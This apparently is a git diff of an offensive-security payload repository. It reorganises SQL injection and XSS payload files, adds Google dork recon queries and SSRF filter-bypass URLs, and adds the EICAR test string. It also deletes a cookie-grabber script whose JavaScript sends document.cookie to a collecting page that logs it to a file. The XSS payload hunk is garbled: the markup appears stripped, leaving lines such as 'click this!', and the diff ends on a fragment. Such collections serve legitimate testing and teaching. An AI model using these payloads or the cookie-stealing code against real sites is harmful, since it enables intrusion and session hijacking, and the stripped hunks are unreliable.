diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md index 471f459..cf53ee8 100644 --- a/Methodology_and_enumeration.md +++ b/Methodology_and_enumeration.md @@ -18,10 +18,11 @@ knockpy domain.com -w subdomains-top1mil-110000.txt * Using Google Dorks and Google Transparency Report ```bash site:*.domain.com -www -site:http://domain.com filetype:pdf -site:http://domain.com inurl:& -site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin -site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf +site:domain.com filetype:pdf +site:domain.com inurl:'&' +site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin +site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf +site:*.*.domain.com You need to include subdomains ;) https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true diff --git a/SQL injection/Payloads/FUZZDB_GenericBlind.txt b/SQL injection/Intruders/FUZZDB_GenericBlind.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_GenericBlind.txt rename to SQL injection/Intruders/FUZZDB_GenericBlind.txt diff --git a/SQL injection/Payloads/FUZZDB_MSSQL-WHERE_Blind.txt b/SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Blind.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_MSSQL-WHERE_Blind.txt rename to SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Blind.txt diff --git a/SQL injection/Payloads/FUZZDB_MSSQL.txt b/SQL injection/Intruders/FUZZDB_MSSQL.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_MSSQL.txt rename to SQL injection/Intruders/FUZZDB_MSSQL.txt diff --git a/SQL injection/Payloads/FUZZDB_MSSQL_Enumeration.txt b/SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_MSSQL_Enumeration.txt rename to SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt diff --git a/SQL injection/Payloads/FUZZDB_MYSQL.txt b/SQL injection/Intruders/FUZZDB_MYSQL.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_MYSQL.txt rename to SQL injection/Intruders/FUZZDB_MYSQL.txt diff --git a/SQL injection/Payloads/FUZZDB_MySQL-WHERE_Blind.txt b/SQL injection/Intruders/FUZZDB_MySQL-WHERE_Blind.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_MySQL-WHERE_Blind.txt rename to SQL injection/Intruders/FUZZDB_MySQL-WHERE_Blind.txt diff --git a/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt b/SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt rename to SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt diff --git a/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt b/SQL injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt rename to SQL injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt diff --git a/SQL injection/Payloads/FUZZDB_Oracle.txt b/SQL injection/Intruders/FUZZDB_Oracle.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_Oracle.txt rename to SQL injection/Intruders/FUZZDB_Oracle.txt diff --git a/SQL injection/Payloads/FUZZDB_Postgres_Enumeration.txt b/SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt similarity index 100% rename from SQL injection/Payloads/FUZZDB_Postgres_Enumeration.txt rename to SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt diff --git a/SQL injection/Payloads/Generic_SQLi b/SQL injection/Intruders/Generic_SQLi similarity index 100% rename from SQL injection/Payloads/Generic_SQLi rename to SQL injection/Intruders/Generic_SQLi diff --git a/SQL injection/Payloads/SQLi_Polyglots.txt b/SQL injection/Intruders/SQLi_Polyglots.txt similarity index 100% rename from SQL injection/Payloads/SQLi_Polyglots.txt rename to SQL injection/Intruders/SQLi_Polyglots.txt diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 53a6fec..fd99c41 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -28,7 +28,7 @@ Advanced exploit using type=url ``` Change "type=file" to "type=url" Paste URL in text field and hit enter -Using this vulnerability users can upload images from any image URL = trigger an SSRF +Using this vulnerability users can upload images from any image URL = trigger an SSRF ``` ## Bypassing @@ -58,5 +58,20 @@ localhost:+11211aaa localhost:00011211aaaa ``` +Bypass using rare address +``` +http://0/ +``` + +Bypass using tricks combination +``` +http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ +urllib2 : 1.1.1.1 +requests + browsers : 2.2.2.2 +urllib : 3.3.3.3 +``` + ## Thanks to * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) +* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648) +* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) diff --git a/Upload insecure files/Eicar/eicar.com.txt b/Upload insecure files/Eicar/eicar.com.txt new file mode 100644 index 0000000..a2463df --- /dev/null +++ b/Upload insecure files/Eicar/eicar.com.txt @@ -0,0 +1 @@ +X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* \ No newline at end of file diff --git a/XSS injection/Cookie Grabber XSS.php b/XSS injection/Cookie Grabber XSS.php deleted file mode 100644 index 2058e44..0000000 --- a/XSS injection/Cookie Grabber XSS.php +++ /dev/null @@ -1,11 +0,0 @@ -document.location='http://localhost/XSS/grabber.php?c=' + document.cookie - -// Write the cookie in a file -$cookie = $_GET['c']; -$fp = fopen('cookies.txt', 'a+'); -fwrite($fp, 'Cookie:' .$cookie.'\r\n'); -fclose($fp); - -?> \ No newline at end of file diff --git "a/XSS injection/files/\">" "b/XSS injection/Files/\">" similarity index 100% rename from "XSS injection/files/\">" rename to "XSS injection/Files/\">" diff --git a/XSS injection/files/'> b/XSS injection/Files/'> similarity index 100% rename from XSS injection/files/'> rename to XSS injection/Files/'> diff --git a/XSS injection/files/InsecureFlashFile.swf b/XSS injection/Files/InsecureFlashFile.swf similarity index 100% rename from XSS injection/files/InsecureFlashFile.swf rename to XSS injection/Files/InsecureFlashFile.swf diff --git a/XSS injection/files/SVG_XSS.svg b/XSS injection/Files/SVG_XSS.svg similarity index 100% rename from XSS injection/files/SVG_XSS.svg rename to XSS injection/Files/SVG_XSS.svg diff --git a/XSS injection/files/SWF_XSS.swf b/XSS injection/Files/SWF_XSS.swf similarity index 100% rename from XSS injection/files/SWF_XSS.swf rename to XSS injection/Files/SWF_XSS.swf diff --git a/XSS injection/XML XSS basic.html b/XSS injection/Files/XML XSS.xml similarity index 100% rename from XSS injection/XML XSS basic.html rename to XSS injection/Files/XML XSS.xml diff --git a/XSS injection/files/XML_XSS.xml b/XSS injection/Files/XML_XSS_cheatsheet.html similarity index 100% rename from XSS injection/files/XML_XSS.xml rename to XSS injection/Files/XML_XSS_cheatsheet.html diff --git a/XSS injection/files/xss_comment_exif_metadata_double_quote.png b/XSS injection/Files/xss_comment_exif_metadata_double_quote.png similarity index 100% rename from XSS injection/files/xss_comment_exif_metadata_double_quote.png rename to XSS injection/Files/xss_comment_exif_metadata_double_quote.png diff --git a/XSS injection/files/xss_comment_exif_metadata_single_quote.png b/XSS injection/Files/xss_comment_exif_metadata_single_quote.png similarity index 100% rename from XSS injection/files/xss_comment_exif_metadata_single_quote.png rename to XSS injection/Files/xss_comment_exif_metadata_single_quote.png diff --git a/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt b/XSS injection/Intruders/BRUTELOGIC-XSS-JS.txt similarity index 100% rename from XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt rename to XSS injection/Intruders/BRUTELOGIC-XSS-JS.txt diff --git a/XSS injection/BRUTELOGIC-XSS-STRINGS.txt b/XSS injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt similarity index 53% rename from XSS injection/BRUTELOGIC-XSS-STRINGS.txt rename to XSS injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt index 5ea07a0..2d73886 100644 --- a/XSS injection/BRUTELOGIC-XSS-STRINGS.txt +++ b/XSS injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt @@ -6,78 +6,78 @@ '-alert(1)// \'-alert(1)// -lose focus! -click this! -copy this! -right click this! -copy this! -double click this! -drag this! -focus this! -input here! -press any key! -press any key! -press any key! -click this! -hover this! -hover this! -hover this! -click this! +lose focus! +click this! +copy this! +right click this! +copy this! +double click this! +drag this! +focus this! +input here! +press any key! +press any key! +press any key! +click this! +hover this! +hover this! +hover this! +click this! paste here! - +``` + ## XSS in HTML/Applications XSS Basic ```